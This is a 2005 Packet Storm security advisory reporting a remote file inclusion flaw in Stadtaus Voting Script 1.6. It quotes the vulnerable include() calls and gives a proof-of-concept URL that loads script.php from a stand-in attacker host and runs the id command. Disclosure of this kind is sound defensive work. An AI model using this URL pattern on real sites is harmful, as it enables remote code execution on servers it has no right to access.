stadtaus16.txt

2005-03-15T00:00:00
ID PACKETSTORM:36529
Type packetstorm
Reporter Nextime
Modified 2005-03-15T00:00:00

Description

                                        
                                            `-----------------------------------------------------------------------------  
Name: Stadtaus Voting Script   
Release: 1.6   
Homepage: http://www.stadtaus.com/php_scripts/voting_script/  
Attack: Remote file inclusion  
Risk: High  
Date: 8 March 2005  
Author: Nextime  
-----------------------------------------------------------------------------  
  
CODE:  
  
file: /vs1.6/inc/core.inc.php  
  
  
/*****************************************************  
** Include functions  
*****************************************************/  
  
include($script_root . 'inc/functions.inc.php');  
include($script_root . 'inc/template.class.inc.php');  
include($script_root . 'inc/form_fields.class.inc.php');  
include($script_root . 'inc/voting.class.inc.php');  
  
  
  
---------------------------------------------------------------------------------------------  
  
ATTACK:  
  
If register_globals=on and allow_url_fopen=on  
  
http://[target]/vs1.6/inc/core.inc.php?script_root=http://[attacker_host]/script.php?&cmd=id;  
  
  
---------------------------------------------------------------------------------------------  
  
FIX:  
  
Vendor has been notifed  
  
---------------------------------------------------------------------------------------------  
  
Contact:  
  
Nextime - nextime [at] linuxmail [dot] org  
  
  
--   
______________________________________________  
Check out the latest SMS services @ http://www.linuxmail.org   
This allows you to send and receive SMS through your mailbox.  
  
  
Powered by Outblaze  
`